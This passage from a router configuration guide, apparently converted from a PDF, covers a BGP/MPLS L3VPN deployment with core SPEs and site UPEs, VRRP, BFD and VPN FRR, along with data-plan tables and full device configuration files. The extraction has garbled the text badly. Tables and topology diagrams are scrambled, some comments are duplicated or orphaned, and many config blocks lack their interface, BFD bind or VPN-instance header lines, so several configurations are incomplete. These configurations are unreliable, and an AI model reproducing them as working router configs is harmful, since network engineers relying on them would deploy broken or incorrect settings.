forwarding during a master/backup switchover on the device transmitting VPN
services.
2.5.6.2 Data Plan
NOTE
topology.
Table 2-21 Service interfaces

NE Role Value Remarks
Site1_UPE1 interface -
XGigabitEthernet1/0/4.200:
172.18.200.66/26
172.18.200.67/26
172.18.150.2/26

NE Role Value Remarks
172.18.150.3/26
172.18.100.2/26
172.18.100.3/26
Table 2-22 MPLS VPN parameters

VPN instance name vpna -
RD value UPE: 1:1 It is recommended that the

Core_SPE1: 5:1 same RD value be set on
UPEs and SPEs. If different
Core_SPE2: 3:1 RD values are set, to make
Core_SPE3: 4:1 VPN FRR take effect, you
need to run the vpn-route
cross multipath command
to add multiple VPNv4
routes to a VPN instance
with a different RD value
from these routes' RD
values.
RT 0:1 Plan the same RT on the

entire network.
Table 2-23 BGP parameters

Para Core_ Core_ Core_ Site1 Site1 Site2 Site2 Site3 Site3
meter SPE1 SPE2 SPE3 _UPE _UPE _UPE _UPE _UPE _UPE
1 2 3 4 5 6
BGP 65000 65000 65000 65000 65000 65000 65000 65000 65000
proces
s ID
Router 172.16 172.16 172.16 172.16 172.16 172.16 172.16 172.16 172.16
ID .0.5 .0.3 .0.4 .2.51 .2.50 .2.75 .2.76 .2.87 .2.86

Para Core_ Core_ Core_ Site1 Site1 Site2 Site2 Site3 Site3
meter SPE1 SPE2 SPE3 _UPE _UPE _UPE _UPE _UPE _UPE
1 2 3 4 5 6
Peer devCo devCo devCo devCo devCo devCo devCo devCo devCo
group re: re: re: re: re: re: re: re: re:
172.16 172.16 172.16 172.16 172.16 172.16 172.16 172.16 172.16
.0.3, .0.4, .0.3, .0.3, .0.3, .0.3, .0.3, .0.4, .0.4,
172.16 172.16 172.16 172.16 172.16 172.16 172.16 172.16 172.16
.0.4 .0.5 .0.5 .0.5 .0.5 .0.4 .0.4 .0.5 .0.5
devHo devHo devHo devHo devHo devHo devHo devHo devHo
st: st: st: st: st: st: st: st: st:
172.16 172.16 172.16 172.16 172.16 172.16 172.16 172.16 172.16
.2.50, .2.50, .2.75, .2.50 .2.51 .2.76 .2.75 .2.86 .2.87
172.16 172.16 172.16
.2.51, .2.51, .2.76,
172.16 172.16 172.16
.2.86, .2.75, .2.86,
172.16 172.16 172.16
.2.87 .2.76 .2.87
policy Enabl Enabl Enabl Enabl Enabl Enabl Enabl Enabl Enabl
vpn- e e e e e e e e e
target
Tunne Deplo Deplo Deplo - - - - - -

l y y y
policy
select
or
Peer - - - Impro Impro Impro Impro Impro Impro

priorit ve the ve the ve the ve the ve the ve the
y peer peer peer peer peer peer
priorit priorit priorit priorit priorit priorit
y of y of y of y of y of y of
Core_ Core_ Core_ Core_ Core_ Core_
SPE1 SPE2 SPE2 SPE3 SPE3 SPE1
so that so that so that so that so that so that
UPEs UPEs UPEs UPEs UPEs UPEs
prefer prefer prefer prefer prefer prefer
entiall entiall entiall entiall entiall entiall
y y y y y y
select select select select select select
routes routes routes routes routes routes
advert advert advert advert advert advert
ised ised ised ised ised ised
from from from from from from
Core_ Core_ Core_ Core_ Core_ Core_
SPE1. SPE2. SPE2. SPE3. SPE3. SPE1.

2.5.6.3 Configuring MP-BGP
BGP Connection Diagram

12 0:100 00
0 :1
57 :12 10 13:13
CE1 20 20 CE3
vpna
:5 7 :57 vpna
20 7 20
5
Core_SPE1
30 0
0 30
200
200
200 200
Site1_UPE2 30
0 0 Site3_UPE5
30
20
00
1 2 0 :2 0 0 0 :3
5 7 :1 2 30 13:13
20 20
:5 7 :57
20 7 20
5
Core_SPE2 Core_SPE3
5720:5720
5720:5720
300
300
20
200:200
300:300
0
20 0
23:23
23:23
CE2 BGP peers

vpna n preferred-value
Community Attribute
Procedure
l Configure SPEs.
tunnel-selector TSel permit node 9
if-match ip next-hop ip-prefix core_nhp //Configure a tunnel policy
selector to enable Core_SPE1 to select any tunnel to be iterated when the
next-hop address of a VPNv4 route has the prefix of another SPE.
#
tunnel-selector TSel permit node 10 //Configure a tunnel policy selector to
iterate a route received from an IBGP peer to a TE tunnel when the route
needs to be forwarded to another IBGP peer and Core_SPE1 needs to modify the
next hop of the route to itself.
apply tunnel-policy TE
#
bgp 65000
group devCore internal //Create an IBGP peer group.
peer devCore connect-interface LoopBack1 //Specify loopback interface 1
and its address as the source interface and address of BGP packets.
peer 172.16.0.3 as-number 65000 //Set up a peer relationship between SPEs.
peer 172.16.0.3 group devCore //Add SPEs to the IBGP peer group.
peer 172.16.0.4 as-number 65000
peer 172.16.0.4 group devCore
group devHost internal

peer devHost connect-interface LoopBack1

peer 172.16.2.50 as-number 65000
peer 172.16.2.50 group devHost
peer 172.16.2.51 as-number 65000
peer 172.16.2.86 as-number 65000
peer 172.16.2.87 as-number 65000
#
ipv4-family unicast
undo synchronization
undo peer devCore enable
undo peer devHost enable
undo peer 172.16.2.50 enable
#
ipv4-family vpnv4
policy vpn-target
tunnel-selector TSel //An SPE advertises the default route to UPEs. The
SPE modifies the next hop of UPEs' routes to itself and forwards the routes
to other SPEs. Therefore, configure a tunnel policy selector to iterate BGP
VPNv4 routes sent to UPEs to TE tunnels and to iterate BGP VPNv4 routes sent
to other SPEs to LSPs.
peer devCore enable
peer devCore route-policy core-import import //Configure Core_SPE1 to
filter information about all routes of sites connected to Core_SPE1 when it
receives routes from other SPEs.
peer devCore advertise-community
peer 172.16.0.3 enable
peer devHost enable
peer devHost route-policy p_iBGP_RR_in import //Configure Core_SPE1 to
filter out host routes when receiving routes from UPEs; set the preferred
value of the route between Core_SPE1 and its directly connected UPEs to 300,
and set the preferred value of routes between Core_SPE1 and other UPEs to 200.
peer devHost advertise-community //Advertise community attributes to the
IBGP peer group.
peer devHost upe //Configure the peer devHost as a UPE.
peer devHost default-originate vpn-instance vpna //Send the default route
of VPN instance vpna to UPEs.
#
#
route-policy p_iBGP_RR_in deny node 5 //Filter out host routes of all sites.
if-match ip-prefix deny_host
if-match community-filter all_site
#
route-policy p_iBGP_RR_in permit node 11 //Set the preferred value of the
route between Core_SPE1 and its directly connected UPE to 300.
if-match community-filter site1
apply preferred-value 300
#
route between Core_SPE1 and another UPE to 200.


#
route between Core_SPE1 and another UPE to 200.
#
route-policy p_iBGP_RR_in permit node 20 //Permit all the other routes.
#
route-policy core-import deny node 5 //Deny all routes of sites directly
connected to Core_SPE1.
#
route-policy core-import deny node 6 //Deny all routes of sites directly
connected to Core_SPE1.
#
route-policy core-import permit node 10 //Permit all the other routes.
#
ip ip-prefix deny_host index 10 permit 0.0.0.0 0 greater-equal 32 less-equal
32 //Permit all 32-bit host routes and deny all the other routes.
ip ip-prefix core_nhp index 10 permit 172.16.0.3 32
ip ip-prefix core_nhp index 20 permit 172.16.0.4 32 //Permit routes to
172.16.0.3/32 and 172.16.0.4/32 and deny all the other routes.
#
ip community-filter basic site1 permit 100:100 //Create a community
attribute filter site1 and set the community attribute to 100:100.
ip community-filter basic site2 permit 200:200
ip community-filter basic all_site permit 5720:5720
#
l Configure UPEs.
bgp 65000
group devCore internal
peer devCore connect-interface LoopBack1
peer 172.16.0.3 as-number 65000
peer 172.16.0.5 as-number 65000
peer 172.16.2.50 as-number 65000
#
ipv4-family unicast
#
ipv4-family vpnv4
policy vpn-target
peer devCore enable
peer devCore route-policy p_iBGP_host_ex export //Configure the community
attribute of routes that Site1_UPE1 sends to SPEs.
peer 172.16.0.3 preferred-value 200 //Set the preferred value of the
route between Site1_UPE1 and Core_SPE2 to 200.


peer 172.16.0.5 preferred-value 300 //Set the priority of Core_SPE1 to
300 so that Site1_UPE1 preferentially selects routes advertised from
Core_SPE1.
peer devHost enable
peer devHost advertise-community
#
#
route-policy p_iBGP_host_ex permit node 0 //Add the community attribute for
the route.
apply community 100:100 5720:5720 12:12
#
----End

l Run the display bgp vpnv4 all peer command to check the BGP VPNv4 peer status.
Using Core_SPE1 as an example, if the value of State is Established, BGP peer
relationships have been set up successfully.
[Core_SPE1]display bgp vpnv4 all peer
BGP local router ID : 172.16.0.5

Local AS number : 65000
Total number of peers : 4 Peers in established state : 4
Peer V AS MsgRcvd MsgSent OutQ Up/Down State

PrefRcv
172.16.2.51 4 65000 2102 1859 0 20:55:17

Established 550
172.16.2.86 4 65000 3673 2989 0 0026h03m
Established 550
172.16.0.3 4 65000 1659 1462 0 20:57:05
Established 200
172.16.0.4 4 65000 3421 2494 0 0026h03m
Established 200
2.5.6.4 Configuring an L3VPN
Context
VPN instances need to be configured to advertise VPNv4 routes and forward data to achieve
communication over a L3VPN.
Procedure
l Configure SPEs.
ip vpn-instance vpna //Create a VPN instance.
ipv4-family
route-distinguisher 5:1 //Configure an RD.
tnl-policy TSel //Configure a TE tunnel for the VPN instance.
vpn-target 0:1 export-extcommunity //Configure the extended community
attribute VPN target.

#
bgp 65000
#
ipv4-family vpnv4
nexthop recursive-lookup delay 10 //Set the next-hop iteration delay to
10s.
route-select delay 120 //Set the route selection delay to 120s,
preventing traffic interruption caused by fast route switchback.
#
ipv4-family vpn-instance vpna
default-route imported //Import the default route to VPN instance vpna.
nexthop recursive-lookup route-policy delay_policy //Configure BGP next-
hop iteration based on the routing policy delay_policy.
nexthop recursive-lookup delay 10
route-select delay 120
#
route-policy delay_policy permit node 0 //Permit routes of all sites.
#
l Configure UPEs.
arp vlink-direct-route advertise //Advertise IPv4 ARP Vlink direct routes.
#
ip vpn-instance vpna
ipv4-family
tnl-policy TSel
arp vlink-direct-route advertise
#
undo port trunk allow-pass vlan 1
#
interface XGigabitEthernet1/0/4.200
ip binding vpn-instance vpna //Bind the VPN instance to the corresponding
service interface.
arp direct-route enable //Configure the ARP module to report ARP Vlink
direct routes to the RM module.
ip address 172.18.200.66 255.255.255.192
arp broadcast enable //Enable ARP broadcast of a VLAN tag termination sub-
interface.
#
bgp 65000
#
ipv4-family vpnv4
#
default-route imported
import-route direct route-policy p_iBGP_RR_ex //Import direct routes to
VPN instance vpna and add the community attribute.
#
#
route-policy p_iBGP_RR_ex permit node 0 //Add the community attribute for
the route.
apply community 100:100 5720:5720 12:12
#
arp expire-time 62640 //Set the aging time of dynamic ARP entries.
arp static 172.18.200.68 0001-0002-0003 vid 200 interface

XGigabitEthernet1/0/4.200 //Configure a static ARP entry.

#
----End
2.5.6.5 Configuring Reliability Protection
1. Deploy VRRP on two UPEs at a site to ensure reliability of uplink traffic on CEs. Site1
is used as an example, as shown in Figure 2-20.
– Configure Site1_UPE1 as the master node and Site1_UPE2 as the backup node in a
VRRP group. If Site1_UPE1 is faulty, uplink traffic on CE1 will be quickly
switched to Site1_UPE2.
– Configure BFD for VRRP so that hardware-based BFD can quickly detect faults.
When a fault is detected, hardware notifies the backup device in a VRRP group to
switch as the master device. Additionally, hardware directly sends gratuitous ARP
packets to instruct devices at the access layer to forward traffic to the new master
device.
– Configure backup devices to forward service traffic. When the VRRP status of a
device is Backup, the device can forward traffic as long as it receives traffic. This
prevents service traffic loss and shortens service interruption time if the aggregation
device is faulty.
NOTE
If there are more than 64 VRRP groups, run the set vrrp max-group-number max-group-number
command on the UPEs to set the maximum number of allowed VRRP groups.
Figure 2-20 VRRP between two UPEs
Site1_UPE1
CE1
vpna
D
Master
BF
ck
tra
RP
VR
Backup
Configure the backup device
to forward service traffic.
Site1_UPE2 Upstream
2. Deploy VPN FRR on a UPE. If the TE tunnel between the UPE and an SPE is faulty,
traffic is automatically switched to the TE tunnel between the UPE and another SPE at
the same site. Site1_UPE1 is used as an example, as shown in Figure 2-21.

Site1_UPE1 has two TE tunnels to Core_SPE1 and Core_SPE2 respectively. Deploying

VPN FRR on Site1_UPE1 ensures that traffic is quickly switched to Core_SPE2 if
Core_SPE1 is faulty.
Figure 2-21 VPN FRR from an aggregation device to a core device

Site1_UPE1
VPN FRR
CE1
L3 Primary path
vpna VP
N
Core_SPE1
L3VPN
Backup
path
Site1_UPE2
Upstream
Core_SPE2
3. Deploy VPN FRR on an SPE, for example Core_SPE1. If Core_SPE2 connected to

Core_SPE1 is faulty, Core_SPE1 switches VPN services to Core_SPE3, implementing
fast E2E switchovers of VPN services, as shown in Figure 2-22.
Figure 2-22 VPN FRR between core devices
Core_SPE1
VPN FRR
PN
L3
Primary path Backup path

VP
V
L3
Core_SPE2 Core_SPE3
Downstream
4. Deploy VPN FRR on an SPE. If the TE tunnel between the SPE and a UPE is faulty,
traffic is automatically switched to the TE tunnel between the SPE and another UPE at
the same site. Core_SPE2 is used as an example, as shown in Figure 2-23.

Core_SPE2 has two TE tunnels to Site2_UPE3 and Site2_UPE4 respectively. Deploying

VPN FRR on Core_SPE2 ensures that traffic is quickly switched to Site2_UPE4 if
Site2_UPE3 is faulty.
Figure 2-23 VPN FRR from a core device to an aggregation device
Core_SPE2 Core_SPE3
VPN FRR
Primary path Ba
L3VPN
ck L3V
up P
pa N
th
CE2 Downstream
vpna
5. Deploy IP+VPN hybrid FRR on UPEs. If the interface of a UPE detects a fault on the
link between the UPE and its connected CE, the UPE quickly switches traffic to its peer
UPE, and the peer UPE then forwards the traffic to the CE. Site2 is used as an example,
as shown in Figure 2-24.
If the link from Site2_UPE3 to CE2 is faulty, traffic is forwarded to Site2_UPE4 through
an LSP and then to CE2 using a private IP address, improving network reliability.
Figure 2-24 Deployment of IP+VPN hybrid FRR on UPEs

Backup path
6. Deploy VPN GR on all UPEs and SPEs to ensure uninterrupted VPN traffic forwarding
during a master/backup switchover on the device transmitting VPN services.
Procedure
l Configure SPEs.
bgp 65000
graceful-restart //Enable BGP GR.
#
ipv4-family vpnv4
auto-frr //Enable VPNv4 FRR.

bestroute nexthop-resolved tunnel //Configure the system to select a

VPNv4 route only when the next hop is iterated to a tunnel, preventing packet
loss during a revertive switchover.
#
auto-frr //Enable VPN auto FRR.
vpn-route cross multipath //Add multiple VPNv4 routes to a VPN instance
with a different RD value from these routes' RD values, making VPN FRR take
effect.
#
l Configure UPEs.
ipv4-family
ip frr route-policy mixfrr //Enable IP FRR.
#
vrrp vrid 1 virtual-ip 172.18.200.65 //Configure VRRP.
vrrp vrid 1 preempt-mode timer delay 250 //Set the preemption delay of
switches in a VRRP group.
vrrp vrid 1 track bfd-session 2200 peer //Enable BFD for VRRP to implement
master/backup switchovers.
vrrp vrid 1 backup-forward //Enable the backup device to forward service
traffic.
vrrp track bfd gratuitous-arp send enable //Enable BFD for VRRP to quickly
send gratuitous ARP packets during master/backup switchovers.
#
bfd vrrp-1 bind peer-ip 172.18.200.67 vpn-instance vpna interface
XGigabitEthernet1/0/4.200 source-ip 172.18.200.66 //Configure static BFD
for VRRP.
#
bgp 65000
graceful-restart
#
auto-frr
#
#
route-policy mixfrr permit node 0 //Set the backup next hop to the loopback
interface 1 of another UPE at the same site.
apply backup-nexthop 172.16.2.50
#
----End

l Run the display ip routing-table vpn-instance command on SPEs to check the VPN
FRR status from SPEs to UPEs.
The command output on Core_SPE2 is used as an example. The fields in boldface
indicate the backup next hop, backup label, and backup tunnel ID. The command output
shows that the hybrid FRR entry from Core_SPE2 to a UPE has been generated.

[Core_SPE2]display ip routing-table vpn-instance vpna 172.18.150.4 verbose

------------------------------------------------------------------------------
Routing Table : 1
Summary Count : 1
Destination: 172.18.150.0/26
Protocol: IBGP Process ID: 0
Preference: 255 Cost: 0
NextHop: 172.16.2.75 Neighbour: 172.16.2.75
State: Active Adv Relied Age: 21h55m50s
Tag: 0 Priority: low
Label: 1025 QoSInfo: 0x0
IndirectID: 0x185
RelayNextHop: 0.0.0.0 Interface: Tunnel111
TunnelID: 0x2 Flags: RD
BkNextHop: 172.16.2.76 BkInterface: Tunnel121
BkLabel: 1024 SecTunnelID: 0x0
BkPETunnelID: 0x3 BkPESecTunnelID: 0x0
BkIndirectID: 0xd
l Run the display ip routing-table vpn-instance command on UPEs to check the hybrid
FRR status.
The command output on Site2_UPE3 is used as an example. The fields in boldface
indicate the backup next hop, backup label, and backup tunnel ID. The command output
shows that the hybrid FRR entry has been generated. The command output shows that
the master hybrid FRR route is to the local sub-interface, and the backup route is to the
UPE with IP address 172.16.2.76 at the same site.
[Site2_UPE3]display ip routing-table vpn-instance vpna 172.18.150.4 verbose
------------------------------------------------------------------------------
Routing Table : 1
Summary Count : 2
Destination: 172.18.150.4/32
Protocol: Direct Process ID: 0
State: Active Adv Age: 1d02h36m21s
Tag: 0 Priority: high
Label: NULL QoSInfo: 0x0
IndirectID: 0x0
RelayNextHop: 0.0.0.0 Interface: XGigabitEthernet0/0/2.150
TunnelID: 0x0 Flags: D
BkNextHop: 172.16.2.76 BkInterface: XGigabitEthernet0/0/4
BkLabel: 1024 SecTunnelID: 0x0
BkPETunnelID: 0x4800001b BkPESecTunnelID: 0x0
BkIndirectID: 0x0
Destination: 172.18.150.4/32
Protocol: IBGP Process ID: 0
State: Inactive Adv Relied Age: 1d02h36m21s
Tag: 0 Priority: low
Label: 1024 QoSInfo: 0x0
IndirectID: 0xcd
RelayNextHop: 172.16.8.181 Interface: XGigabitEthernet0/0/4
TunnelID: 0x4800001b Flags: R
l Run the display vrrp interface command to check the VRRP status.
The command output on Site2_UPE3 is used as an example. The fields in boldface in the
command output indicate that the VRRP status of Site2_UPE3 is Master, the backup
device has been configured to forward service traffic, and BFD for VRRP has been
configured.

[Site2_UPE3]display vrrp interface XGigabitEthernet0/0/2.150

XGigabitEthernet0/0/2.150 | Virtual Router 1
State : Master
Virtual IP : 172.18.150.1
Master IP : 172.18.150.2
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Backup-forward : enabled
Track BFD : 1150 type: peer
BFD-session state : UP
Create time : 2016-05-21 11:02:27
Last change time : 2016-05-21 11:02:55
2.5.7 Configuration Files
2.5.7.1 Core_SPE1 Configuration File
sysname Core_SPE1
#
router id 172.16.0.5
#
stp disable
#
ipv4-family
tnl-policy TSel
#
if-match ip next-hop ip-prefix core_nhp
#
#
bfd
#
mpls lsr-id 172.16.0.5
mpls
mpls te
label advertise non-null
mpls rsvp-te
mpls rsvp-te hello
mpls rsvp-te hello full-gr
mpls te cspf
#
mpls ldp
graceful-restart
#
#
undo portswitch

ip address 172.17.4.8 255.255.255.254

ospf ldp-sync
mpls
mpls te
mpls te link administrative group c
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
undo portswitch
ip address 172.17.4.2 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
undo portswitch
ip address 172.17.4.10 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
eth-trunk 5
#
eth-trunk 5
#
eth-trunk 5
#
eth-trunk 5
#
eth-trunk 4
#
eth-trunk 4
#
eth-trunk 4
#
eth-trunk 4
#

eth-trunk 17
#
eth-trunk 17
#
eth-trunk 17
#
eth-trunk 17
#
undo portswitch
ip address 172.17.10.2 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface LoopBack1
ip address 172.16.0.5 255.255.255.255
#
interface Tunnel611
mpls te commit
#
interface Tunnel622
mpls te commit
#
interface Tunnel711
mpls te commit
#
interface Tunnel721

mpls te commit
#
bgp 65000
graceful-restart
peer 172.16.0.3 as-number 65000
peer 172.16.0.4 as-number 65000
peer 172.16.2.50 as-number 65000
peer 172.16.2.51 as-number 65000
peer 172.16.2.86 as-number 65000
peer 172.16.2.87 as-number 65000
#
ipv4-family unicast
#
ipv4-family vpnv4
policy vpn-target
auto-frr
tunnel-selector TSel
bestroute nexthop-resolved tunnel
peer devCore enable
peer devCore route-policy core-import import
peer devHost enable
peer devHost route-policy p_iBGP_RR_in import
peer devHost upe
peer devHost default-originate vpn-instance vpna
#

auto-frr
nexthop recursive-lookup route-policy delay_policy
vpn-route cross multipath
#
ospf 1
spf-schedule-interval millisecond 10
lsa-originate-interval 0
lsa-arrival-interval 0
opaque-capability enable
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#NInJJ<oF9VXb:BS~~9+JT'suROXkVHNG@8+*3FyB%^
%#
network 172.16.0.5 0.0.0.0
network 172.17.4.2 0.0.0.0
network 172.17.4.8 0.0.0.0
network 172.17.4.10 0.0.0.0
network 172.17.10.2 0.0.0.0
mpls-te enable
#
route-policy delay_policy permit node 0
#
route-policy p_iBGP_RR_in deny node 5
#
route-policy p_iBGP_RR_in permit node 11
#
#
#
#
route-policy core-import deny node 5
#
#
route-policy core-import permit node 10
#
ip ip-prefix deny_host index 10 permit 0.0.0.0 0 greater-equal 32 less-equal 32
#
#
tunnel-policy TSel

tunnel select-seq cr-lsp lsp load-balance-number 1

#
tunnel-policy TE
#
bfd SPE1toSPE2 bind ldp-lsp peer-ip 172.16.0.3 nexthop 172.17.4.9 interface Eth-
Trunk4
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
Trunk5
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE1_b bind mpls-te interface Tunnel611 te-lsp backup
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE1toUPE1_m bind mpls-te interface Tunnel611 te-lsp
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit

#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return
sysname Core_SPE2
#
#
stp disable
#
ipv4-family
tnl-policy TSel
#
#
#
bfd
#
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls te cspf
#
mpls ldp
graceful-restart
#

#
undo portswitch
ip address 172.17.4.0 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
undo portswitch
ip address 172.17.4.9 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
undo portswitch
ip address 172.17.4.12 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
eth-trunk 2
#
eth-trunk 2
#
eth-trunk 2
#
eth-trunk 2
#
eth-trunk 17
#
eth-trunk 17
#
eth-trunk 17

#
eth-trunk 17
#
undo portswitch
ip address 172.16.8.178 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
eth-trunk 4
#
eth-trunk 4
#
eth-trunk 4
#
eth-trunk 4
#
interface LoopBack1
ip address 172.16.0.3 255.255.255.255
#
interface Tunnel111
mpls te commit
#
interface Tunnel121
mpls te commit
#
interface Tunnel612
mpls te commit

#
interface Tunnel621
mpls te commit
#
bgp 65000
graceful-restart
peer 172.16.0.4 as-number 65000
peer 172.16.0.5 as-number 65000
peer 172.16.2.50 as-number 65000
peer 172.16.2.51 as-number 65000
peer 172.16.2.75 as-number 65000
peer 172.16.2.76 as-number 65000
#
ipv4-family unicast
#
ipv4-family vpnv4
policy vpn-target
auto-frr
peer devCore enable
peer devHost enable
peer devHost upe
#


auto-frr
#
ospf 1
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#8|'*QyJCZ<@"H2,\pm@FUK3R3uSfFGaaJr39=1%^%#
network 172.16.0.3 0.0.0.0
network 172.16.8.178 0.0.0.0
network 172.17.4.0 0.0.0.0
network 172.17.4.9 0.0.0.0
network 172.17.4.12 0.0.0.0
mpls-te enable
#
#
#
#
#
#
#
#
#
#
#
#

tunnel-policy TSel
#
tunnel-policy TE
#
Trunk4
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
Trunk2
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst

commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return
sysname Core_SPE3
#
#
stp disable
#
ipv4-family
tnl-policy TSel
#
#
#
bfd
#
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls te cspf
#
mpls ldp
graceful-restart
#


#
undo portswitch
ip address 172.17.4.1 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
undo portswitch
ip address 172.17.4.3 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
eth-trunk 5
#
eth-trunk 5
#
eth-trunk 5
#
eth-trunk 5
#
eth-trunk 2
#
eth-trunk 2
#
eth-trunk 2
#
eth-trunk 2
#
undo portswitch
ip address 172.16.8.213 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te

mpls rsvp-te hello

mpls ldp
#
undo portswitch
ip address 172.16.8.183 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface LoopBack1
ip address 172.16.0.4 255.255.255.255
#
interface Tunnel112
mpls te bfd enable
mpls te commit
#
interface Tunnel122
mpls te commit
#
interface Tunnel712
mpls te commit
#
interface Tunnel722
mpls te commit

#
bgp 65000
graceful-restart
peer 172.16.0.3 as-number 65000
peer 172.16.0.5 as-number 65000
peer 172.16.2.75 as-number 65000
peer 172.16.2.76 as-number 65000
peer 172.16.2.86 as-number 65000
peer 172.16.2.87 as-number 65000
#
ipv4-family unicast
#
ipv4-family vpnv4
policy vpn-target
auto-frr
peer devCore enable
peer devHost enable
peer devHost upe
#
auto-frr
#
ospf 1


flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#N@WU@i600:_5W!%F!L~9%7ui(!x:VP5<mJ:z>zJX%^
%#
network 172.16.0.4 0.0.0.0
network 172.16.8.183 0.0.0.0
network 172.16.8.213 0.0.0.0
network 172.17.4.1 0.0.0.0
network 172.17.4.3 0.0.0.0
mpls-te enable
#
#
#
#
#
#
#
#
#
#
#
#
tunnel-policy TSel
#
tunnel-policy TE
#
Trunk5

detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
Trunk2
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit

#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return
2.5.7.4 Site1_UPE1 Configuration File
sysname Site1_UPE1
#
router id 172.16.2.51
#
#
stp disable
#
ipv4-family
ip frr route-policy mixfrr
tnl-policy TSel
#
bfd
#
mpls lsr-id 172.16.2.51
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls te cspf
#
mpls ldp
graceful-restart
#
undo portswitch
description Site1_UPE1 TO Site1_UPE2
ip address 172.17.4.14 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp

#
undo portswitch
ip address 172.17.4.11 255.255.255.254
ospf ldp-sync
mpls
mpls te
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
eth-trunk 17
#
eth-trunk 17
#
eth-trunk 17
#
eth-trunk 17
#
#
ip binding vpn-instance vpna
arp direct-route enable
ip address 172.18.200.66 255.255.255.192
vrrp vrid 1 preempt-mode timer delay 250
vrrp vrid 1 track bfd-session 2200 peer
vrrp vrid 1 backup-forward
vrrp track bfd gratuitous-arp send enable
#
eth-trunk 7
#
eth-trunk 7
#
eth-trunk 7
#
eth-trunk 7
#
interface LoopBack1
ip address 172.16.2.51 255.255.255.255
#
interface Tunnel611


mpls te commit
#
interface Tunnel612
mpls te commit
#
XGigabitEthernet1/0/4.200 source-ip 172.18.200.66
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
commit
#
bgp 65000
graceful-restart
peer 172.16.0.3 as-number 65000
peer 172.16.0.5 as-number 65000
peer 172.16.2.50 as-number 65000
#
ipv4-family unicast
#
ipv4-family vpnv4
policy vpn-target
peer devCore enable
peer devCore route-policy p_iBGP_host_ex export
peer 172.16.0.3 preferred-value 200
peer devHost enable
#
import-route direct route-policy p_iBGP_RR_ex
auto-frr
#
#

ospf 1
bandwidth-reference 100000
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#nU!dUe#c'J!;/%*WtZxQ<gP:'zx_E2OQnML]q;s#%^
%#
network 172.16.2.51 0.0.0.0
network 172.17.4.11 0.0.0.0
network 172.17.4.14 0.0.0.0
mpls-te enable
#
route-policy mixfrr permit node 0
#
route-policy p_iBGP_host_ex permit node 0
apply community 100:100 5720:5720 12:12
#
